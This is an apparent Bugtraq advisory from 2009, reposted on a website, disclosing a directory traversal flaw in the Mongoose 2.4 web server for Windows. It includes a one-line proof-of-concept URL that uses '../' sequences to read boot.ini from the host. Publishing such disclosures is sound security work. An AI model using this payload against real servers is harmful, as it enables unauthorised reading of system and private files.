New User, Welcome!     Login

MonGoose 2.4 Directory Traversal Vulnerability

From: ew1zz hotmail com
To: bugtraq securityfocus com
Cc:
Subject: MonGoose 2.4 Directory Traversal Vulnerability
Date: Mon - Apr 13, 2009 04:16 PM


######### MonGoose 2.4 (win) webserver Directory Traversal  #########



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini





Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!